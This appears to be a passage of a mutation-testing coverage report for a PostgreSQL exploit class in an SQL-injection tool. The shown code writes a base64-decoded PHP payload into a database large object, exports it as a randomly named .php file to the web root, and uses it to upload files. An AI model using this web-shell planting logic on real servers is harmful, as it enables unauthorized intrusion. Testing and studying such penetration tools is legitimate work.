| 436 | ); | |
| 437 |
2
1. lambda$createSql$1 : negated conditional → NO_COVERAGE 2. lambda$createSql$1 : negated conditional → NO_COVERAGE |
if (resultQuery != null && resultQuery.contains(ResourceAccess.SQL_CONFIRM_RESULT)) { |
| 438 | var request = new Request(); | |
| 439 |
1
1. lambda$createSql$1 : removed call to com/jsql/model/bean/util/Request::setMessage → NO_COVERAGE |
request.setMessage(Interaction.ADD_TAB_EXPLOIT_SQL); |
| 440 |
1
1. lambda$createSql$1 : removed call to com/jsql/model/bean/util/Request::setParameters → NO_COVERAGE |
request.setParameters(urlSuccess, username, password); |
| 441 |
1
1. lambda$createSql$1 : removed call to com/jsql/model/InjectionModel::sendToViews → NO_COVERAGE |
this.injectionModel.sendToViews(request); |
| 442 |
1
1. lambda$createSql$1 : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitPostgres::lambda$createSql$1 → NO_COVERAGE |
return urlSuccess; |
| 443 | } | |
| 444 | return StringUtils.EMPTY; | |
| 445 | }; | |
| 446 | ||
| 447 | String bodyExploit = StringUtil.base64Decode( | |
| 448 | this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty("exploit.sql.pdo.pgsql") | |
| 449 | ) | |
| 450 | .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) | |
| 451 | .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); | |
| 452 | ||
| 453 | var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format( | |
| 454 | this.modelYaml.getFile().getWrite().getLargeObject().getFromText(), | |
| 455 | bodyExploit.replace("'", "\"") | |
| 456 | ), ResourceAccess.ADD_LOID); | |
| 457 |
1
1. createSql : negated conditional → NO_COVERAGE |
if (StringUtils.isEmpty(loid)) { |
| 458 | LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND); | |
| 459 | return StringUtils.EMPTY; | |
| 460 | } | |
| 461 | var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; | |
| 462 | this.injectionModel.getResourceAccess().getResultWithCatch(String.format( | |
| 463 | this.modelYaml.getFile().getWrite().getLargeObject().getToFile(), | |
| 464 | loid, | |
| 465 | pathExploit + nameExploit | |
| 466 | ), ResourceAccess.WRITE_LOID); | |
| 467 | ||
| 468 |
1
1. createSql : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitPostgres::createSql → NO_COVERAGE |
return this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); |
| 469 | } | |
| 470 | ||
| 471 | public void createUpload(String pathExploit, String urlExploit, File fileToUpload) { | |
| 472 | String bodyExploit = StringUtil.base64Decode( | |
| 473 | this.injectionModel.getMediatorUtils().getPropertiesUtil().getProperty(ResourceAccess.EXPLOIT_DOT_UPL) | |
| 474 | ) | |
| 475 | .replace(DataAccess.SHELL_LEAD, DataAccess.LEAD) | |
| 476 | .replace(DataAccess.SHELL_TRAIL, DataAccess.TRAIL); | |
| 477 | ||
| 478 | var loid = this.injectionModel.getResourceAccess().getResultWithCatch(String.format( | |
| 479 | this.modelYaml.getFile().getWrite().getLargeObject().getFromText(), | |
| 480 | bodyExploit.replace("'", "\"") | |
| 481 | ), ResourceAccess.ADD_LOID); | |
| 482 |
1
1. createUpload : negated conditional → NO_COVERAGE |
if (StringUtils.isEmpty(loid)) { |
| 483 | LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.LOID_NOT_FOUND); | |
| 484 | return; | |
| 485 | } | |
| 486 | var nameExploit = RandomStringUtils.secure().nextAlphabetic(8) +".php"; | |
| 487 | this.injectionModel.getResourceAccess().getResultWithCatch(String.format( | |
| 488 | this.modelYaml.getFile().getWrite().getLargeObject().getToFile(), | |
| 489 | loid, | |
| 490 | pathExploit + nameExploit | |
| 491 | ), ResourceAccess.WRITE_LOID); | |
| 492 | ||
| 493 | BinaryOperator<String> biFuncGetRequest = (String pathExploitFixed, String urlSuccess) -> { | |
| 494 | try (InputStream streamToUpload = new FileInputStream(fileToUpload)) { | |
| 495 | HttpResponse<String> result = this.injectionModel.getResourceAccess().upload(fileToUpload, urlSuccess, streamToUpload); | |
| 496 |
1
1. lambda$createUpload$2 : negated conditional → NO_COVERAGE |
if (result.body().contains(DataAccess.LEAD +"y")) { |
| 497 | LOGGER.log(LogLevelUtil.CONSOLE_SUCCESS, ResourceAccess.UPLOAD_SUCCESSFUL, pathExploit, fileToUpload.getName()); | |
| 498 | } else { | |
| 499 | LOGGER.log(LogLevelUtil.CONSOLE_ERROR, ResourceAccess.UPLOAD_FAILURE, pathExploit, fileToUpload.getName()); | |
| 500 | } | |
| 501 | } catch (InterruptedException e) { | |
| 502 | LOGGER.log(LogLevelUtil.IGNORE, e, e); | |
| 503 |
1
1. lambda$createUpload$2 : removed call to java/lang/Thread::interrupt → NO_COVERAGE |
Thread.currentThread().interrupt(); |
| 504 | } catch (IOException | JSqlException e) { | |
| 505 | throw new JSqlRuntimeException(e); | |
| 506 | } | |
| 507 |
1
1. lambda$createUpload$2 : replaced return value with "" for com/jsql/model/accessible/vendor/ExploitPostgres::lambda$createUpload$2 → NO_COVERAGE |
return urlSuccess; |
| 508 | }; | |
| 509 | ||
| 510 | this.injectionModel.getResourceAccess().checkUrls(urlExploit, nameExploit, biFuncGetRequest); | |
| 511 | } | |
| 512 | ||
| 513 | public ModelYamlPostgres getModelYaml() { | |
| 514 |
1
1. getModelYaml : replaced return value with null for com/jsql/model/accessible/vendor/ExploitPostgres::getModelYaml → NO_COVERAGE |
return this.modelYaml; |
| 515 | } | |
| 516 | } | |
Mutations | ||
| 53 |
1.1 |
|
| 55 |
1.1 |
|
| 62 |
1.1 |
|
| 64 |
1.1 |
|
| 73 |
1.1 |
|
| 82 |
1.1 |
|
| 89 |
1.1 |
|
| 90 |
1.1 |
|
| 91 |
1.1 |
|
| 96 |
1.1 |
|
| 98 |
1.1 |
|
| 100 |
1.1 |
|
| 102 |
1.1 |
|
| 104 |
1.1 |
|
| 106 |
1.1 |
|
| 109 |
1.1 |
|
| 114 |
1.1 2.2 3.3 4.4 5.5 |
|
| 133 |
1.1 |
|
| 136 |
1.1 |
|
| 137 |
1.1 |
|
| 138 |
1.1 |
|
| 139 |
1.1 |
|
| 141 |
1.1 |
|
| 148 |
1.1 |
|
| 152 |
1.1 |
|
| 154 |
1.1 |
|
| 156 |
1.1 |
|
| 166 |
1.1 |
|
| 168 |
1.1 |
|
| 184 |
1.1 |
|
| 186 |
1.1 |
|
| 190 |
1.1 |
|
| 191 |
1.1 |
|
| 192 |
1.1 |
|
| 193 |
1.1 |
|
| 198 |
1.1 |
|
| 201 |
1.1 |
|
| 202 |
1.1 |
|
| 203 |
1.1 |
|
| 204 |
1.1 |
|
| 206 |
1.1 |
|
| 214 |
1.1 |
|
| 231 |
1.1 |
|
| 232 |
1.1 |
|
| 233 |
1.1 |
|
| 234 |
1.1 |
|
| 238 |
1.1 |
|
| 241 |
1.1 2.2 |
|
| 260 |
1.1 |
|
| 271 |
1.1 2.2 |
|
| 278 |
1.1 |
|
| 281 |
1.1 |
|
| 289 |
1.1 2.2 |
|
| 293 |
1.1 |
|
| 306 |
1.1 |
|
| 307 |
1.1 |
|
| 320 |
1.1 |
|
| 321 |
1.1 |
|
| 322 |
1.1 |
|
| 323 |
1.1 |
|
| 347 |
1.1 |
|
| 348 |
1.1 |
|
| 349 |
1.1 |
|
| 350 |
1.1 |
|
| 356 |
1.1 |
|
| 381 |
1.1 |
|
| 382 |
1.1 |
|
| 383 |
1.1 |
|
| 384 |
1.1 |
|
| 398 |
1.1 |
|
| 413 |
1.1 |
|
| 418 |
1.1 |
|
| 419 |
1.1 |
|
| 420 |
1.1 |
|
| 421 |
1.1 |
|
| 437 |
1.1 2.2 |
|
| 439 |
1.1 |
|
| 440 |
1.1 |
|
| 441 |
1.1 |
|
| 442 |
1.1 |
|
| 457 |
1.1 |
|
| 468 |
1.1 |
|
| 482 |
1.1 |
|
| 496 |
1.1 |
|
| 503 |
1.1 |
|
| 507 |
1.1 |
|
| 514 |
1.1 |